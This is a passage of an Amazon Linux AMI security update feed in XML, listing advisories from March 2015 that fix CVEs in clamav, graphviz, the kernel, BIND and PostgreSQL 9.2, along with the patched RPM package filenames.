name="postgresql93-docs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.6-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-486</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-486: medium priority package update for clamav</title><issued date="2015-03-04 15:52:00" /><updated date="2015-03-04 16:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9328:
ClamAV before 0.98.6 allows remote attackers to have unspecified impact via a crafted upack packer file, related to a "heap out of bounds condition."
1187050:
CVE-2014-9328 clamav: heap out of bounds condition with crafted upack packer files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9328" title="" id="CVE-2014-9328" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-lib" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-server" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-milter" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-data" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamd" 
version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-filesystem" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-data-empty" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-server-sysvinit" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamd" version="0.98.6" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/clamd-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.98.6-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-487</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-487: medium priority package update for graphviz</title><issued date="2015-03-04 15:53:00" /><updated date="2015-03-04 16:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9157:
Format string vulnerability in the yyerror function in lib/cgraph/scan.l in Graphviz allows remote attackers to have unspecified impact via format string specifiers in an unknown vector, which are not properly handled in an error string.
1167866:
CVE-2014-9157 graphviz: format string vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9157" title="" id="CVE-2014-9157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-debuginfo" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package 
name="graphviz-devel" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.44.amzn1" epoch="0" 
arch="i686"><filename>Packages/graphviz-devel-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.38.0-18.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-488</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-488: medium priority package update for graphviz-php</title><issued date="2015-03-04 15:53:00" /><updated date="2015-03-04 16:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9157:
Format string vulnerability in the yyerror function in lib/cgraph/scan.l in Graphviz allows remote attackers to have unspecified impact via format string specifiers in an unknown vector, which are not properly handled in an error string.
1167866:
CVE-2014-9157 graphviz: format string vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9157" title="" id="CVE-2014-9157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-php" version="2.38.0" release="18.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php-2.38.0-18.40.amzn1.x86_64.rpm</filename></package><package name="graphviz-php" version="2.38.0" release="18.40.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php-2.38.0-18.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-489</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-489: medium priority package update for kernel</title><issued date="2015-03-05 09:31:00" /><updated date="2015-03-05 09:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0274:
A flaw was found in the way the Linux kernel's XFS file system handled replacing of remote attributes under certain conditions. A local user with access to an XFS file system mount could potentially use this flaw to escalate their privileges on the system.
1195248:
CVE-2015-0274 kernel: xfs: replacing remote attributes memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0274" title="" id="CVE-2015-0274" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.34" release="27.48.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.34" release="27.48.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-3.14.34-27.48.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-490</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-490: medium priority package update for bind</title><issued date="2015-03-13 02:33:00" /><updated date="2015-03-13 02:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1349:
A flaw was found in the way BIND handled trust anchor management. A remote attacker could use this flaw to cause the BIND daemon (named) to crash under certain conditions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1349" title="" id="CVE-2015-1349" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0672.html" title="" id="RHSA-2015:0672" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" 
release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-491</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-491: low priority package update for kernel</title><issued date="2015-03-13 02:34:00" /><updated date="2015-03-13 02:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1593:
1192519:
CVE-2015-1593 kernel: Linux stack ASLR implementation Integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1593" title="" id="CVE-2015-1593" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.35" release="28.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.35" release="28.38.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-3.14.35-28.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-492</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-492: medium priority package update for postgresql92</title><issued date="2015-03-13 02:37:00" /><updated date="2015-03-13 02:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0244:
A flaw was found in the way PostgreSQL handled certain errors that were generated during protocol synchronization. An authenticated database user could use this flaw to inject queries into an existing connection.
1188694:
CVE-2015-0244 postgresql: loss of frontend/backend protocol synchronization after an error
CVE-2015-0243:
A stack-buffer overflow flaw was found in PostgreSQL's pgcrypto module. An authenticated database user could use this flaw to cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
1188689:
CVE-2015-0243 postgresql: buffer overflow flaws in contrib/pgcrypto
CVE-2015-0242:
A buffer overflow flaw was found in PostgreSQL's internal printf() implementation. An authenticated database user could use a specially crafted string in an SQL query to cause PostgreSQL to crash or, potentially, lead to privilege escalation.
1188688:
CVE-2015-0242 postgresql: buffer overflow flaws in replacement *printf() functions
CVE-2015-0241:
A buffer overflow flaw was found in the way PostgreSQL handled certain numeric formatting. An authenticated database user could use a specially crafted timestamp formatting template to cause PostgreSQL to crash or, under certain conditions, execute arbitrary code with the permissions of the user running PostgreSQL.
1188684:
CVE-2015-0241 postgresql: buffer overflow in the to_char() function
CVE-2014-8161:
An information leak flaw was found in the way the PostgreSQL database server handled certain error messages. An authenticated database user could possibly obtain the results of a query they did not have privileges to execute by observing the constraint violation error messages produced when the query was executed.
1182043:
CVE-2014-8161 postgresql: information leak through constraint violation errors
CVE-2014-0067:
The "make check" command for the test suites in PostgreSQL 9.3.3 and earlier does not properly invoke initdb to specify the authentication requirements for a database cluster to be used for the tests, which allows local users to gain privileges by leveraging access to this cluster.
1065863:
CVE-2014-0067 postgresql: Vulnerability during "make check"
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0067" title="" id="CVE-2014-0067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8161" title="" id="CVE-2014-8161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0241" title="" id="CVE-2015-0241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0242" title="" id="CVE-2015-0242" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0243" title="" id="CVE-2015-0243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0244" title="" id="CVE-2015-0244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-server-compat" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.10" 
